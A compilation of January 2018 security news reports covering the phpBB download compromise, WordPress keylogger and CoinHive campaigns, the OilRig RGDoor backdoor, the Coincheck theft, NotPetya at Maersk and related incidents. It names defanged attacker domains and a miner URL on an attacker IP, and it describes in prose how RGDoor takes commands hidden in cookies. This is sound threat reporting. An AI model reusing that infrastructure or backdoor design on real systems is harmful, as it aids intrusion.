The compromised download links were online for around three hours, between 12:02 PM UTC and 15:03 PM UTC on January 26, those who used them received a malware.

Users who downloaded phpBB 3.2.2 packages on January 26 must verify the SHA256 file hash of the file they downloaded with the one reported on the phpBB official downloads page.

phpBB%20forum%20software

The phpBB development team is investigating the incident, it only revealed that the entry point is likely a third-party site and clarified that neither phpBB.com nor the phpBB software were exploited in this attack.

At the time of writing it is still unclear how hackers compromised the download URLs.

The phpBB maintainers quickly removed the links to the malicious payload.

Developers that have already used the package to install or update a phpBB forum, are advised to file an incident report on the forum tracker to receive assistance with removal of the malicious code.


Attackers behind Cloudflare_solutions Keylogger are back, 2000 WordPress sites already infected
28.1.2018 securityaffairs
Virus

More than 2,000 WordPress sites have been infected with a malicious script that can deliver both a keylogger and the cryptocurrency miner CoinHive.
More than 2,000 sites running the WordPress CMS have been infected with a malicious script that can deliver both a keylogger and the in-browser cryptocurrency miner CoinHive.

This new hacking campaign was spotted by experts from the security firm Sucuri, the experts believe the attackers are the same that launched a campaign that infected 5,500 WordPress sites in December.

In both campaigns, the threat actors used a keylogger dubbed cloudflare[.]solutions, but be careful, there is no link to security firm Cloudflare.

After the discovery in December of campaign, the cloudflare[.]solutions domain was taken down, but this new discovery confirms that threat actors are still active and are using a new set of recently registers domains to host the malicious scripts that are injected into WordPress sites.

By querying the search engine PublicWWW, researchers discovered that the number of infected sites includes 129 from the domain cdns[.]ws and 103 websites for cdjs[.]online.

“A few days after our keylogger post was released on Dec 8th, 2017, the Cloudflare[.]solutions domain was taken down. This was not the end of the malware campaign, however; attackers immediately registered a number of new domains including cdjs[.]online on Dec 8th, cdns[.]ws on Dec 9th, and msdns[.]online on Dec 16th.” reads the analysis published by Sucuri.

“PublicWWW has already identified relatively few infected sites: 129 websites for cdns[.]ws and 103 websites for cdjs[.]online, but it’s likely that the majority of the websites have not been indexed yet. Since mid-December, msdns[.]online has infected over a thousand websites, though the majority are reinfections from sites that have already been compromised.”

Most of the infected domains are tied to msdns[.]online, with over a thousand reported infections. In many cases, threat actors re-infected WordPress sites compromised in the previous campaign.

WordPress%20sites%20hacking

The attackers target outdated and poorly configured WordPress sites, they inject the cdjs[.]online script either a WordPress database (wp_posts table) or into the theme’s functions.php file.

The Keylogger script is able to capture data entered on every website form, including the admin login form, information is sent back to the attackers via the WebSocket protocol.

Just like previous versions of the campaign leveraging a Fake GoogleAnalytics Script, researchers identified a fake googleanalytics.js that loads an obfuscated script used to load the malicious scripts “startGoogleAnalytics” from the attackers’ domains.

Experts discovered many similarities also in the cryptominer component of this campaign.

“We’ve identified that the library jquery-3.2.1.min.js is similar to the encrypted CoinHive cryptomining library from the previous version, loaded from hxxp:// 3117488091/lib/jquery-3.2.1.min.js?v=3.2.11 (or hxxp://185 .209 .23 .219/lib/jquery-3.2.1.min.js?v=3.2.11, a more familiar representation of the IP address). This is not surprising since cdjs[.]online also exists on the server 185 .209 .23 .219.” continues the analysis.

“It’s interesting to note that this script extends the CoinHive library and adds an alternative configuration using the 185 .209 .23 .219 server (and now specifically cdjs[.]online) for LIB_URL and WEBSOCKET_SHARDS.”

According to Sucuri experts, the threat actors behind this hacking campaign are active at least since April 2017. Sucuri has tracked at least other three different malicious scripts hosted on the same cloudflare.solutions domain across the months.

The first attack leveraging on these scripts was observed in April when hackers used a malicious JavaScript file to embed banner ads on hacked sites.

In November, experts from Sucuri reported the same attackers were loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive in-browser cryptocurrency miner. By November 22, the experts observed 1,833 sites compromised by the attackers.

Experts noticed that this campaign is still not massive as the one spotted in December, anyway it could not be underestimated.

“While these new attacks do not yet appear to be as massive as the original cloudflare[.]solutions campaign, the reinfection rate shows that there are still many sites that have failed to properly protect themselves after the original infection,” concluded Sucuri.


Intel Working on CPUs With Meltdown, Spectre Protections
27.1.2018 securityweek Safety

Intel is working on CPUs that will include built-in protections against the notorious Meltdown and Spectre attacks, CEO Brian Krzanich revealed on Thursday during a conference call discussing the company’s latest earnings report.

Intel has released some microcode updates to address the vulnerabilities, but the patches have caused serious problems for many users, which has led to Intel and other vendors halting updates.

“Our near term focus is on delivering high quality mitigations to protect our customers’ infrastructure from these exploits. We're working to incorporate silicon-based changes to future products that will directly address the Spectre and Meltdown threats in hardware. And those products will begin appearing later this year,” Krzanich said.Intel to release CPUs with Meltdown and Spectre protections

“However, these circumstances are highly dynamic and we updated our risk factors to reflect both the evolving nature of these specific threats and litigation, as well as the security challenge, more broadly,” he added.

The latest financial report shows that the company had a great 2017, with a record fourth-quarter revenue of $17.1 billion and a record full-year revenue of $62.8 billion. Despite its reputation taking a hit due to the Meltdown and Spectre vulnerabilities, the company expects 2018 to also be a record year.

It’s worth noting, however, that one of the factors that could cause results to differ from the company’s expectations are vulnerabilities in Intel processors and other products. In addition to the security flaws themselves, Intel is concerned about the adverse performance and system instability introduced by mitigations, associated lawsuits, the negative publicity they generate, and the impact they may have on customer relationships and reputation, the company said.

Several class action lawsuits have already been filed against Intel, accusing the company of violating state consumer laws by misleading customers about its product and breaching warranties.

Krzanich sold all the stock he was legally allowed to, worth roughly $24 million, just weeks before the existence of Spectre and Meltdown came to light, which has raised insider trading concerns.

Intel has denied the allegations, but French publication LeMagIT reported this week that Intel started informing its partners of the flaws on the same day the company’s CEO sold his shares, specifically November 29.


Iranian Hackers Target IIS Web Servers With New Backdoor
27.1.2018 securityweek CyberSpy

The Iran-linked cyber-espionage group known as OilRig is using a backdoor to target Internet Information Services (IIS) Web servers used by Middle Eastern government organizations and financial and educational institutions.

Dubbed RGDoor, the malware is believed to be a secondary backdoor that allows the actor to regain access to a compromised Web server in the event the primary malware is detected and removed. This primary malicious tool is the TwoFace webshell, which OilRig is believed to have been using since at least June 2016.

Around since 2015, the OilRig threat group has targeted mainly organizations in the financial and government sectors, in the United States and Middle Eastern countries. Believed to be operating out of Iran, the group is using multiple tools, is expanding its arsenal, and is quick to adopt new exploits.

The backdoor was created using C++, which results in a compiled dynamic link library (DLL) with an exported function named “RegisterModule.” Because of that, Palo Alto's researchers believe the DLL was used as a custom native-code HTTP module loaded into IIS, and suggest that there is no visual representation of the shell for the actors to interact with.

This approach takes advantage of IIS 7 functionality that allows developers to create modules in C++ to extend IIS’ capabilities, such as carry out custom actions on requests. These “native-code modules can be installed either in the IIS Manager GUI or via the command-line using the ‘appcmd’ application,” Palo Alto has explains.

The researchers also found that RGDoor would call the “RegisterModule” function with arguments that ignore inbound HTTP GET requests, but act on all HTTP POST requests, even those issued over HTTPS. The malware parses these requests to look for a specific string in the HTTP “Cookie” field, so as to find whether cmd$ [command to execute], upload$ [path to file], or download$ [path to file] commands were issued to it.

“The sample then transmits the data back to the actor by creating a loop that calls the IHttpResponse::WriteEntityChunk method until all of the data is sent to the actor within HTTP responses. If the WriteEntityChunk method fails at any point during this loop, the code will respond to the actor with a HTTP 500 “Server Error” response by using the IHttpResponse::SetStatus method,” the researchers explain.

Because IIS does not log the values within Cookie fields of inbound HTTP requests by default, it’s difficult to locate and analyze inbound requests related to RGDoor. Furthermore, because the module checks all inbound POST requests for commands, the actor can use any URL to interact with it.

The actors behind the backdoor used the TwoFace webshell to load it onto an IIS Web server and gain backdoor access to the compromised system. The main purpose of the tool, however, appears to be regaining access to the server in the event the TwoFace webshell was removed.

“This backdoor has a rather limited set of commands, however, the three commands provide plenty of functionality for a competent backdoor, as they allow an actor to upload and download files to the sever, as well as run commands via command prompt. The use of RGDoor suggests that this group has contingency plans to regain access to a compromised network in the event their webshells are discovered and remediated,” Palo Alto concludes.


Six Months in Jail for University Email Hacker
27.1.2018 securityweek Crime

A man who accessed over 1,000 email accounts maintained by a New York City-area university to download inappropriate photos and videos was sentenced to 6 months in prison this week.

The man, Jonathan Powell, 30, of Phoenix, Arizona, pled guilty to the charges on August 9, 2017, in Manhattan federal court before United States District Judge Alison J. Nathan, who also imposed the sentence.

According to the allegation he pled guilty to, Powell gained unauthorized access to the email accounts by accessing the password reset utility maintained by the email servers of a United States University that has its primary campus in New York, New York. The tool was meant for authorized users to reset their forgotten passwords.

Powell abused the utility between October 2015 and September 2016 to change the email account passwords of students and others affiliated with the University and to gain access to more than 1,000 accounts.

Once inside the email accounts, he obtained unauthorized access to other password-protected email, social media, and online accounts to which the users of the compromised accounts were registered. These include Apple iCloud, Facebook, Google, LinkedIn, and Yahoo! accounts.

Powell requested password resets for the linked accounts and changed those passwords as well, after a password reset email was sent to the compromised email accounts. Then, he logged into the linked accounts and started looking for private and confidential content.

The investigation into Powell’s nefarious activities revealed that he accessed all of the compromised accounts to download sexually explicit photographs and videos of college-aged women.

Between October 2015 and September 2016, Powell accessed the password reset utility approximately 18,640 different times and attempted around 18,600 password changes for an estimated number of 2,054 unique University email accounts. He succeeded in changing approximately 1,378 passwords for 1,035 email accounts, as he compromised some of the accounts multiple times.

Powell was also found to have compromised 15 email accounts hosted by a University in Pennsylvania. He also admitted to compromising email accounts at several other educational institutions in Arizona, Florida, Ohio, and Texas.

Power was also sentenced to two years of supervised release and ordered to pay $278,855 in restitution.

“Jonathan Powell used his computer skills to breach the security of a university to gain access to the students’ personal accounts. Once Powell had access, he searched the accounts for compromising photos and videos. No college student should have to fear that personal, private information could be mined by strangers for potentially compromising material,” Geoffrey S. Berman, the United States Attorney for the Southern District of New York, commented.


Data Privacy Concerns Cause Sales Delays: Cisco
27.1.2018 securityweek Privacy

Nearly two-thirds of businesses worldwide have experienced significant delays in sales due to customer data privacy concerns, according to Cisco’s 2018 Privacy Maturity Benchmark Study.

The study, based on the responses of roughly 3,000 cybersecurity professionals from 25 countries, shows that 65% of businesses reported sales cycle delays due to concerns over data privacy, with an average delay of nearly 8 weeks.

However, organizations with a mature privacy process are less affected compared to privacy-immature companies. Privacy-mature firms experienced delays of only 3.4 weeks, while immature businesses reported delays averaging nearly 17 weeks.

Sales delays have also varied depending on several other factors, including country, with the longest delays reported in Mexico and Latin America, and industry, with the longest delays in the government and healthcare sectors.

The%20number%20of%20weeks%20sales%20have%20been%20delayed

The report also shows that privacy-mature organizations suffer lower losses as a result of data breaches. According to Cisco, only 39% of privacy-mature organizations experienced losses exceeding $500,000, compared to 74% of companies that have an immature privacy process.

The type of model adopted by organizations for privacy resources also appears to be an important factor. According to the study, businesses with fully centralized and decentralized resources had sales delays of 10 and 7 weeks, respectively. On the other hand, organizations with a hybrid model, which represents a mix between centralized and decentralized, reported delays of less than 5 weeks.

“This study provides valuable empirical evidence of the linkage between firm privacy policies and performance-relevant impacts. These results are indicative of the direction that future empirical research on privacy, and cybersecurity more generally, should take to better validate and focus our understanding of best practices in these important areas,” said Dr. William Lehr, economist at MIT.

The complete 2018 Privacy Maturity Benchmark Study is available for download in PDF format.


Cryptocurrencies Fall After Hack Hits Japan's Coincheck
27.1.2018 securityweek Hacking

Cryptocurrencies fell Friday after Japan-based digital exchange Coincheck suspended client deposits and withdrawals for virtual currencies except bitcoin, saying it had been hacked.

Coincheck said it was investigating "unauthorised access" of the exchange that appeared to result in a loss worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalisation.

"At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It's worth 58 billion yen based on the calculation at the the rate when detected," said Coincheck's chief operating officer Yusuke Otsuka late Friday.

"We're still examining how many of our customers are affected," he said, adding that the exchange was trying to find out whether the breach was from Japan or another country.

After the exchange suspended deposits and withdrawals, NEM plunged more than 16 percent in a 24-hour period, according to CoinMarketCap.com.

Major virtual currencies had rebounded slightly by late Friday but were still down, with Bitcoin dropping 2.13 percent to $10,987.70, ripple sliding more than six percent and ethereum flat.

Coincheck said it had discovered the breach at 11.25 am and announced it had suspended trading for all cryptocurrencies apart from bitcoin in a series of tweets.

According to its website, which proclaims it is "the leading bitcoin and cryptocurrency exchange in Asia", Tokyo-based Coincheck was founded in 2012 and had 71 employees as of July last year.

In 2014 major Tokyo-based bitcoin exchange MtGox collapsed after admitting that 850,000 coins -- worth around $480 million at the time -- had disappeared from its vaults.

Bitcoin is recognized as legal tender in Japan and nearly one third of global bitcoin transactions in December were denominated in yen, according to specialist website jpbitcoin.com.

The virtual currency is well down from record highs approaching $20,000 in late December, having rocketed 25-fold last year, before being hit by concerns about a bubble and worries about crackdowns on trading it.

Billionaire investor George Soros, known for his legendarily successful currency trading, has dismissed bitcoin as a "typical bubble".

But speaking Thursday at the Davos summit, he said the cryptocurrency would likely avoid a full crash because authoritarians would still use it to make secret investments abroad.


PCI Council Introduces New Standard for Mobile Card Payments
27.1.2018 securityweek Mobil

Responding to the market's growing interest in, and use of, mobile payments, the PCI Security Standards Council (PCI SSC) has announced a new standard for software-based PIN entry on commercial off-the-shelf devices (COTS); such as smartphones and tablets.

"Mobile point-of-sale (MPOS) solutions have become very popular with smaller merchants for their flexibility and efficiency," explained said Aite Group senior analyst Ron van Wezel. "MPOS has enabled them to take orders and accept payments on a tablet or smartphone, anytime and anywhere."

The problem is the cost of hardware-based chip-and-pin can be prohibitive for small merchants in mobile situations.

"With the new PIN entry standard," van Wezel continued, "the PCI Council has responded to market need by specifying the security requirements for allowing PIN entry directly on the mobile touchscreen. This means that merchants can accept payments with just their mobile device and a small, cost efficient card reader connected to it along with a secure PIN entry application."

The new standard has been in the pipeline since last summer. In a July 2017 blog post, PCI SSC CTO Troy Leach announced, "We are starting work on a new standard that specifically focuses on software-based PIN-entry on commercial off-the-shelf (COTS) devices, such as consumer-grade mobile phones or tablets."

This is the standard (PDF) now announced. A separate document, Software-Based PIN Entry on COTS Test Requirements, will be published in the next month.

"With advancements in monitoring capabilities and the ability to isolate account data, we are introducing a security approach that leverages software-based security for accepting a PIN within the boundaries of a COTS device," said Leach in a new blog post on Wednesday -- adding that it was an alternative to, and not a replacement for, the existing PCI PIN Transaction Security Point of Interaction (PTS POI) standard.

There are five core principles to the new standard: isolation of PIN from other account data; ensuring the security of the PIN entry application on the COTS device; active security monitoring of the device; a secure card reader device to encrypt account data; and the restriction of transactions to EMV contact and contactless cards.

Initial reaction from the security industry has been mixed; that is, it is a good basic idea, but with reservations.

"While the new PCI PIN requirements are a good idea," Joseph Carson, chief security scientist at Thycotic told SecurityWeek, "this introduces increased risks as end to end security for PIN cannot be guaranteed. For example, credit card theft in Europe has been less impacted than credit card theft in the USA due to the PIN requirement -- meaning that credit card fraud in Europe has been limited due to the PIN. The new requirements mean the risk of the PIN getting exposed is increased and the risk on cyberattacks against the merchants will also increase. The PIN has been protected up until now; however, this new standard is actually lowering that protection."

Chris Morales, head of security analytics at Vectra Networks, has a different concern. "I have questions around how the PCI council intends for vendors to implement the required continuous monitoring for security threats," he said. "Continuous monitoring could be a costly and time-consuming exercise only large vendors or the payment system supplier would be able to afford to implement correctly. I believe these will need to be vetted out with further review by the security community."

Chris Roberts, chief security architect at Acalvio is also concerned about the monitoring aspect. "Monitoring and actually 'doing' anything about it are two different things. We've run afoul of that so many times in the past where companies are monitoring but are asleep at the wheel. It might be time for PCI to look at technologies that go beyond simply reacting.

"It's good they have realized that payments are going mobile," he added, "but it does feel as if they are in reactive mode as opposed to proactively looking at the marketplace and working with the vendors ahead of time to help shape the future as opposed to being part of the problem in 'gatekeeping'."

PCI SSC believes it has got the security right by isolating the PIN within the COTS device from the account identifying information. "This isolation happens as the Primary Account Number (PAN) is never entered on the COTS device with the PIN," said Leach. "Instead that information is captured by an EMV Chip reader that is approved as an SCRP that encrypts the contact or contactless transaction."

And it should be said that he has support. Sanjay Kalra, co-founder and chief product officer at Lacework, comments, "Businesses required to comply to PCI cover many industries -- retail, hospitality, entertainment, healthcare, electronics and more -- and are all rapidly being disrupted by mobile and cloud computing. They need to upgrade their payment processes to reflect the technology disruptions. This update to the PCI standard is welcome and will help organizations safely take advantage of new mobile technologies. Nobody should be surprised if similar changes come to regulations for the cloud."


Cybercriminals are offering for sale infant fullz on the dark web
27.1.2018 securityaffairs CyberCrime

Cybercriminals are offering for sale infant fullz on the dark web, this is the first time that unscrupulous sellers offer this kind of merchandise on a black marketplace.
Crooks are offering for sale Social Security numbers of babies on the dark web, the news was reported by the CNN.

The news is disconcerting, this is the first time that unscrupulous sellers offer this kind of merchandise on a black marketplace.

The offer appeared on the Dream Market marketplace, one of the biggest Tor marketplace that has been around since around Nov/Dec 2013.

The seller is offering Social Security numbers of babies along with their dates of birth and mother’s maiden names, the ‘Infant fullz’ goes for $300 worth of bitcoin.

The slang term “Fullz” refers full packages of individuals’ identifying information. A “Fullz” package contains an individual’s name, Social Security number, birth date, account numbers and other data.

“Infant fullz get em befor tax seson [sic],” reads the ad.

‘Infant Fullz’ are a precious commodity in the criminal underground they allow crooks to access a clean credit history, they also allow crooks to apply for government benefits or take out mortgages.

The use of children PII is considered secure by cyber criminals because this specific type of identity theft could remain undiscovered for years.

“The listing for infant data was discovered by researchers at Terbium Labs, a dark web intelligence firm. The cost and age of the alleged victims came as a surprise to Emily Wilson, the company’s director of analysis.” states the CNN.

“Although the firm has seen child data for sale before, this was the first time it has seen infants’ data for sale.”

“It’s unusual to have information specifically marked as belonging to children or to infants on these markets,” Wilson said.

dark%20web

Identity theft crimes involving children is not a novelty, according to a 2011 report published by Carnegie Mellon University’s CyLab, the rate of this specific type of crimes for children as being 51 times greater than that of adults.

Researchers highlighted that “parents typically don’t monitor their children’s identities”.


Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked
27.1.2018 securityaffairs Hacking

It is a black Friday for cryptocurrencies, after the news of the hack of the Japan-based digital exchange Coincheck the value of major cryptocurrencies dropped.
It is a black Friday for cryptocurrencies, the news of the hack of the Japan-based digital exchange Coincheck had a significant impact on their value.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The Coincheck suspended the operations of deposits and withdrawals for all the virtual currencies except bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The news of the incident has a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Coincheck%20hack%20NEM%20Value
NEM Charts – CoinMarketCap.com

The experts at the exchange are investigating the security breach to find out whether it was from Japan or another country.

Coincheck discovered the incident at 11.25 am and notified the suspension of trading for all cryptocurrencies apart from bitcoin via Twitter.


Coincheck
@coincheck_en
We are currently halting deposits, withdrawals, buying and selling of NEM. Please accept our sincere apologies for this inconvenience and rest assured that we are working to resolve this issue as quickly as possible.https://coincheck.com/en/blog/4673

5:04 AM - Jan 26, 2018

*Urgent update regarding deposits of NEM* | Coincheck Cryptocurrency Exchange
View the latest news today for bitcoin market in Japan, cryptocurrency, new features, and campaign at Coincheck Blog.

coincheck.com

Twitter Ads info and privacy
In February 2014, Mt. Gox suspended trading and filed for bankruptcy protection from creditors.

At the time, the company was handling over 70% of all bitcoin transactions worldwide, it announced that approximately 850,000 bitcoins ($450 million at the time) belonging to customers and the company were stolen.


Hurry up, update your Lenovo Fingerprint Manager Pro if you use Windows 7, 8 and 8.1
27.1.2018 securityaffairs
Vulnerebility

Lenovo has fixed a hardcoded password vulnerability in Lenovo Fingerprint Manager Pro affecting a dozen laptop models running Windows 7, 8 and the 8.1 OS.
The PC vendor Lenovo has fixed a hardcoded password vulnerability, tracked as (CVE-2017-3762), affecting a dozen Lenovo laptop models that run versions of Microsoft Windows 7, 8 and the 8.1 operating system.

Lenovo laptops running Windows 10 are not impacted by the vulnerability because that OS version natively supports fingerprint reader technology.

The list of impacted family models includes ThinkPad, ThinkCentre, and ThinkStation laptops.

“A vulnerability has been identified in Lenovo Fingerprint Manager Pro. Sensitive data stored by Lenovo Fingerprint Manager Pro, including users’ Windows logon credentials and fingerprint data, is encrypted using a weak algorithm, contains a hard-coded password, and is accessible to all users with local non-administrative access to the system it is installed in.” states the security advisory published by Lenovo.

Lenovo%20Fingerprint%20Manager%20Pro

The Lenovo Fingerprint Manager Pro is a utility that allows users to log into their laptop and configured websites by using the fingerprint.

The flaw resides in the Lenovo Fingerprint Manager Pro that encrypts sensitive data such as fingerprint data and login credentials using a weak algorithm.

Customers urge to update Fingerprint Manager Pro to version 8.01.87 or later.

The complete list of laptops that need to update their Lenovo Fingerprint Manager Pro version is:

ThinkPad L560
ThinkPad P40 Yoga, P50s
ThinkPad T440, T440p, T440s, T450, T450s, T460, T540p, T550, T560
ThinkPad W540, W541, W550s
ThinkPad X1 Carbon (Type 20A7, 20A8), X1 Carbon (Type 20BS, 20BT)
ThinkPad X240, X240s, X250, X260
ThinkPad Yoga 14 (20FY), Yoga 460
ThinkCentre M73, M73z, M78, M79, M83, M93, M93p, M93z
ThinkStation E32, P300, P500, P700, P900
The flaw was disclosed by Lenovo this week, the company credited Jackson Thuraisamy, a senior security consultant with Security Compass, for the discovery.


Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner
27.1.2018 securityaffairs
Virus

Trend Micro uncovered a spike in the number of Coinhie miners over the past few days, including Coinhive, apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.
The number of cyber-attacks against cryptocurrencies is increased due to a rapid increase in the value of currencies such as Bitcoin and Ethereum.

Hackers targeted almost any actor involved in the business of cryptocurrencies, single users, miners and of course exchanges.

Security firms have detected several malware applications specifically designed to steal cryptocurrencies, and many websites were compromised to install script used to mine virtual coins abusing computational resources of unaware visitors.

Researchers at Trend Micro uncovered a spike in the number of Coinhie miners over the past few days apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.

“On January 24, 2018, we observed that the number of Coinhive web miner detections tripled due to a malvertising campaign. We discovered that advertisements found on high-traffic sites not only used Coinhive (detected by Trend Micro as JS_COINHIVE.GN), but also a separate web miner that connects to a private pool.” states the analysis published by Trend Micro.

“We detected an almost 285% increase in the number of Coinhive miners on January 24. We started seeing an increase in traffic to five malicious domains on January 18. After closely examining the network traffic, we discovered that the traffic came from DoubleClick advertisements.“

Coinhive

The researchers observed two separate web cryptocurrency miner scripts, both hosted on AWS, that were called from a web page that presents the DoubleClick ad.

The advertisement uses a JavaScript code that generates a random number between 1 and 101. If the number generated is greater than 10, the advertisement will call the coinhive.min.js script to mine 80% of the CPU power. For the remaining 10%, the advertisement launch a private web miner, the mqoj_1.js script.

“The two web miners were configured with throttle 0.2, which means the miners will use 80% of the CPU’s resources for mining.” continues the analysis.

Coinhive

Google promptly took action against the ads that abuse users’ resources violating its policies.

Blocking JavaScript-based applications from running on browsers can prevent the execution of Coinhive miners, the experts suggest to regularly patch and update web browsers to reduce the risks.


Dutch Spies Watched as Russians Hacked US Democrats: Report
26.1.2018 securityweek BigBrothers

Dutch intelligence services hacked Russian cyber attackers and alerted US counterparts after watching them transfer "thousands" of Democratic Party emails ahead of the 2016 US election, Dutch media reported Friday.

The Dutch national intelligence service (AIVD) had been watching the notorious group known as Cozy Bear since 2014, according to the respected Volkskrant daily, and a Dutch TV news programme Nieuwsuur.

But as well as stumbling upon the group's computer network which was run out of a university building near Moscow's Red Square, the Dutch agents also gained access to the security cameras surveilling the room.

"Not only can the intelligence service now see what the Russians are doing, they can also see who's doing it," the Volkskrant said, citing anonymous US and Dutch sources.

The AIVD alerted its US counterparts when in 2015 it became a "witness to the Russian hackers harassing and penetrating the leaders of the Democratic Party, transferring thousands of emails and documents," it said.

"Yet, it will be months before the United States realise what this warning means: that with these hacks the Russians have interfered with the American elections. And the AIVD hackers have seen it happening before their very eyes."

Cozy Bear has been widely blamed for meddling in the 2016 US elections won by now President Donald Trump.

Although Trump has vehemently denied working with the Russians, his White House is under investigation by special prosecutor and former FBI director Robert Mueller.

Mueller's team is seeking to uncover whether the Trump campaign colluded with Russia's efforts to sway the election, including leaks of hacked Democratic Party files.

Mueller's team has spent the past eight months interviewing members of Trump's campaign and White House staff, and has issued four indictments, with two guilty pleas.

A spokeswoman for the AIVD refused to confirm the Dutch media reports, telling AFP "we never comment on operations."

But American intelligence agencies have said "with high confidence" they believe the Kremlin was behind the attack on the Democratic Party.

That confidence is based on "AIVD hackers having had access to the office-like space in the centre of Moscow for years," the Volkskrant said, citing sources who added that the Dutch had provided "technical evidence" of the attack on the Democratic Party.


Maersk Reinstalled 50,000 Computers After NotPetya Attack
26.1.2018 securityweek
Ransomware

Jim Hagemann Snabe, chairman of Danish shipping giant A.P. Moller–Maersk, revealed this week at the World Economic Forum in Switzerland that the company was forced to reinstall software on nearly 50,000 devices following the NotPetya attack.

In a panel on securing a common future in cyberspace, Hagemann Snabe, former co-CEO of SAP, said the NotPetya malware had hit a large number of systems housed by the company.

According to Hagemann Snabe, Maersk’s IT team had to reinstall software on its entire infrastructure, including 45,000 PCs and 4,000 servers, totaling 2,500 applications.

The mammoth task took only 10 days to complete, during which time the company manually coordinated operations. This was not easy considering that Maersk is the largest container shipping company in the world and it’s responsible for roughly 20 percent of world trade. Hagemann Snabe noted that a ship carrying 10,000-20,000 containers docks into a port every 15 minutes.

Maersk employees managed to manually process 80 percent of the work volume, but the NotPetya incident still cost the company $250-$300 million.

In the aftermath of the cyberattack, the shipping giant realized that its cybersecurity capabilities had been only “average,” but Hagemann Snabe says the company is now determined to improve cybersecurity to the point where it “becomes a competitive advantage.”

“We need a very significant increase in our level of understanding of this problem,” Hagemann Snabe told the panel. “It is time to stop being naive when it comes to cybersecurity. I think many companies will be caught if they are naive – even size does not help you. I think it is very important that we are not just reactive but proactive, and I think we can’t be average, we got to be the best we can.”

Hagemann Snabe believes his company was probably collateral damage in a state-sponsored attack.

The NotPetya malware outbreak, which U.S. and Ukrainian government agencies have attributed to Russia, affected tens of thousands of systems in more than 65 countries. Many of the victims were located in Ukraine, the home of a tax software firm whose product was used as the main attack vector.

Researchers initially believed NotPetya (also known as PetrWrap, exPetr, GoldenEye and Diskcoder.C) was a piece of ransomware. However, a closer analysis revealed that it was actually a wiper.

In addition to Maersk, the list of major organizations hit by the incident includes Rosneft, Merck, FedEx-owned TNT Express, Mondelez International, Nuance Communications, Reckitt Benckiser, and Saint-Gobain. These companies reported that the attack had cost them tens and even hundreds of millions of dollars.


The Dutch intelligence service AIVD ‘hacked’ Russian Cozy Bear systems for years
26.1.2018 securityaffairs BigBrothers

Spying on spies – The hackers from the Dutch intelligence service AIVD ‘compromised’ for years the network of the Russian APT Cozy Bear.
It’s not a mystery, technology firms that intend to work with Russia need to allow the Government experts to scan their code for backdoors and vulnerabilities.

The problem is that this software is often used by the US Government, this means that Russian experts could found bugs or backdoors to exploit in cyber attacks against US Agencies.

Many tech giants already allowed their software review, including McAfee, SAP, Symantec, and HPE, the risk is that foreign Governments could exploit a bug or a backdoor to control them.

Anyway, other firms like Trend Micro has refused to allow the Russians to conduct a source code review of their products.

Of course, the companies defend their position clarifying that the code review s were done under controlled conditions and that not code was allowed to be copied.

News of the day is that the Dutch intelligence service AIVD ‘hacked’ Russian state-sponsored hackers.

The news was reported by the newspaper de Volkskrant, AIVD in 2014 monitored the activity of the Russian APT Cozy Bear (aka APT29) and its efforts to hack into systems at the US Democratic Party‘s and US government servers.

Dutch intelligence service AIVD provided the FBI with crucial information about Russian interference with the American elections.

The AIVD cyber spies compromised security cameras surrounding the building used by the Cozy Bear crew, the Dutch agents were looking for known Russian spies accessing the structure.

“Hackers from the Dutch intelligence service AIVD have provided the FBI with crucial information about Russian interference with the American elections,” reports the Dutch daily newspaper Volkskrant.nl.

“That’s how the AIVD becomes witness to the Russian hackers harassing and penetrating the leaders of the Democratic Party, transferring thousands of emails and documents. It won’t be the last time they alert their American counterparts.”

Cozy%20Bear

The Dutch hackers conducted a Computer Network Attack against Russians, they are involved in offensive operations aim to compromise adversary networks.

The unit operates under the Joint Sigint Cyber Unit, a collaborative unit of the AIVD and the Dutch Military Intelligence and Security Service MIVD, of about 300 people.

The Dutch cyber unit is composed of about 80-100 people, part of them is focused on intercepting or managing sources, while another team is dedicated to Computer Network Defence.

It’s unknown what exact information the Dutch hackers collected, the unique certainty is that it linked Cozy Bear to the attacks against the US Government.

“Three American intelligence services state with ‘high confidence’ that the Kremlin was behind the attack on the Democratic Party. That certainty, sources say, is derived from the AIVD hackers having had access to the office-like space in the center of Moscow for years. This is so exceptional that the directors of the foremost American intelligence services are all too happy to receive the Dutchmen.” continues the newspaper.

The Cozy Bear hackers are located in a university building near the Red Square, the team is composed on average of ten people. The entrance is in a curved hallway controlled by a security camera that was hacked by Dutch cyber spies.

Thanks to the AIVD, the NSA was able to locate the command and control servers used by Cozy Bear while it was targeting the systems at the State Department.

“Access to Cozy Bear turns out to be a goldmine for the Dutch hackers. For years, it supplies them with valuable intelligence about targets, methods and the interests of the highest ranking officials of the Russian security service. From the pictures taken of visitors, the AIVD deduces that the hacker group is led by Russia’s external intelligence agency SVR.” continues the Volkskrant.

“There’s a reason the AIVD writes in its annual report about 2014 that many Russian government officials, including president Putin, use secret services to obtain information.”

The AIVD hackers left Cozy Bear’s computer network after an investigation that lasted for 1 and 2,5 years, likely because the Russians cut off their access.


Stealth CrossRAT malware targets Windows, MacOS, and Linux systems
26.1.2018 securityaffairs
Virus

The popular former NSA hacker Patrick Wardle published a detailed analysis of the CrossRAT malware used by Dark Caracal for surveillance.
Last week a joint report published by security firm Lookout and digital civil rights group the Electronic Frontier Foundation detailed the activity of a long-running hacking group linked to the Beirut Government and tracked as Dark Caracal. The hacking campaigns conducted by Dark Caracal leverage a custom Android malware included in fake versions of secure messaging apps like Signal and WhatsApp.

The report detailed a new strain of cross-platform malware tracked as CrossRAT (version 0.1), it is remote access Trojan that can infect systems based on Windows, Solaris, Linux, and macOS.

The malware implements classic RAT features, such as taking screenshots and running arbitrary commands on the infected systems.

